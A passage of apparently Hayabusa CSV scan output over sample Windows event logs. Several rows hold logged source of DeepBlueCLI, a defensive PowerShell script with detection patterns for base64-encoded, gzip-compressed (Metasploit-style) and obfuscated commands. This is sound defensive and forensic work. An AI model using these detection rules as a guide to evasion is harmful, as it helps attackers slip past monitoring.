.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:01.705 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:01.705 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:01.705 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:01.708 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:01.714 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:01.717 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} 
""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:15.018 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
